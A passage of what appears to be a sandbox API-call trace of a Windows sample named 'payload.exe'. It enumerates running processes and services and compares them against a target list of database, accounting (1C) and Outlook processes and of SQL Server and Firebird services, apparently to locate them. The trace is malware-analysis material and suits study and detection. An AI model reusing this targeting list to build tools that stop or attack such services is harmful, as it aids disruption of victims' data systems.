szExeFile="userinit.exe")) returned 1 [0268.121] lstrlenW (lpString="userinit.exe") returned 12 [0268.121] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0268.121] lstrlenW (lpString="dwm.exe") returned 7 [0268.121] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0268.122] lstrlenW (lpString="explorer.exe") returned 12 [0268.122] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0268.122] lstrlenW (lpString="spoolsv.exe") returned 11 [0268.122] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0268.122] lstrlenW (lpString="taskhost.exe") returned 12 [0268.122] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.122] lstrlenW (lpString="svchost.exe") returned 11 [0268.123] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0268.123] lstrlenW (lpString="payload.exe") returned 11 [0268.123] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0268.123] lstrlenW (lpString="dllhost.exe") returned 11 [0268.123] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0268.123] lstrlenW (lpString="reader_sl.exe") returned 13 [0268.123] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0268.124] CloseHandle (hObject=0x2ac) returned 1 [0268.124] Sleep (dwMilliseconds=0x1f4) [0268.640] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0268.650] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0268.650] GetLastError () returned 0xea [0268.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0268.650] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0268.650] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0268.651] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0268.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.651] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0268.651] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0268.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0268.651] lstrlenW (lpString="AudioSrv") returned 8 [0268.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0268.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0268.651] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0268.651] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0268.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0268.651] lstrlenW (lpString="BFE") returned 3 [0268.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0268.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0268.651] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0268.651] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0268.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0268.651] lstrlenW (lpString="CryptSvc") returned 8 [0268.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0268.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0268.651] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0268.651] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0268.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0268.651] lstrlenW (lpString="CscService") returned 10 [0268.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0268.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0268.652] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0268.652] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0268.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0268.652] lstrlenW (lpString="DcomLaunch") returned 10 [0268.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.652] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0268.652] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0268.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0268.652] lstrlenW (lpString="Dhcp") returned 4 [0268.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0268.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0268.652] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0268.652] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0268.652] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0268.652] lstrlenW (lpString="Dnscache") returned 8 [0268.652] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0268.652] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0268.653] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0268.653] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0268.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0268.653] lstrlenW (lpString="DPS") returned 3 [0268.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0268.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0268.653] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0268.653] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0268.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0268.653] lstrlenW (lpString="eventlog") returned 8 [0268.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0268.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0268.653] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0268.653] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0268.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0268.653] lstrlenW (lpString="EventSystem") returned 11 [0268.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0268.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0268.653] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0268.653] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0268.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0268.653] lstrlenW (lpString="gpsvc") returned 5 [0268.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0268.653] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0268.653] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0268.653] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0268.653] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0268.653] lstrlenW (lpString="LanmanWorkstation") returned 17 [0268.653] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.654] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0268.654] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0268.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0268.654] lstrlenW (lpString="lmhosts") returned 7 [0268.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0268.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0268.654] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0268.654] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0268.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0268.654] lstrlenW (lpString="MMCSS") returned 5 [0268.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0268.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0268.654] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0268.654] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0268.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0268.654] lstrlenW (lpString="MpsSvc") returned 6 [0268.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0268.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0268.654] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0268.654] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0268.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0268.654] lstrlenW (lpString="NlaSvc") returned 6 [0268.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0268.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0268.654] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0268.654] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0268.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0268.655] lstrlenW (lpString="nsi") returned 3 [0268.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0268.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0268.655] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0268.655] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0268.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0268.655] lstrlenW (lpString="PcaSvc") returned 6 [0268.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0268.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0268.655] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0268.655] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0268.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0268.655] lstrlenW (lpString="PlugPlay") returned 8 [0268.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0268.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0268.655] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0268.655] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0268.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0268.655] lstrlenW (lpString="Power") returned 5 [0268.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0268.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0268.655] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0268.655] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0268.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0268.655] lstrlenW (lpString="ProfSvc") returned 7 [0268.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0268.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0268.656] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0268.656] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0268.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0268.656] lstrlenW (lpString="RpcEptMapper") returned 12 [0268.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.656] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0268.656] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0268.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0268.656] lstrlenW (lpString="RpcSs") returned 5 [0268.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0268.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0268.656] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0268.656] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0268.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0268.656] lstrlenW (lpString="SamSs") returned 5 [0268.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0268.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0268.656] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0268.656] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0268.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0268.656] lstrlenW (lpString="Schedule") returned 8 [0268.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0268.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0268.656] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0268.656] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0268.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0268.656] lstrlenW (lpString="SENS") returned 4 [0268.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0268.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0268.657] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0268.657] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0268.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0268.657] lstrlenW (lpString="ShellHWDetection") returned 16 [0268.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.657] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0268.657] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0268.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0268.657] lstrlenW (lpString="Spooler") returned 7 [0268.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0268.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0268.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0268.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0268.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0268.657] lstrlenW (lpString="Themes") returned 6 [0268.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0268.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0268.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0268.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0268.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0268.657] lstrlenW (lpString="UxSms") returned 5 [0268.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0268.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0268.657] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0268.657] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0268.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0268.658] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0268.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x390 [0268.659] Process32FirstW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.659] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.659] lstrlenW (lpString="System") returned 6 [0268.659] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0268.659] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0268.659] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0268.659] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0268.659] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0268.660] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0268.660] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0268.660] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.660] lstrlenW (lpString="smss.exe") returned 8 [0268.660] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0268.660] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.660] lstrlenW (lpString="csrss.exe") returned 9 [0268.660] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.660] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.660] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.660] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.660] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.660] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.661] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.661] lstrlenW (lpString="wininit.exe") returned 11 [0268.661] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0268.661] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0268.661] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.661] lstrlenW (lpString="csrss.exe") returned 9 [0268.661] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.661] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.661] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.661] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.661] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.661] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.661] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.662] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.662] lstrlenW (lpString="winlogon.exe") returned 12 [0268.662] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0268.662] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0268.662] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0268.662] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0268.669] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0268.669] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0268.669] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0268.669] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.669] lstrlenW (lpString="services.exe") returned 12 [0268.669] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0268.669] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0268.669] Process32NextW (in: hSnapshot=0x390, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.669] lstrlenW (lpString="lsass.exe") returned 9 [0268.669] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0268.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0268.669] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 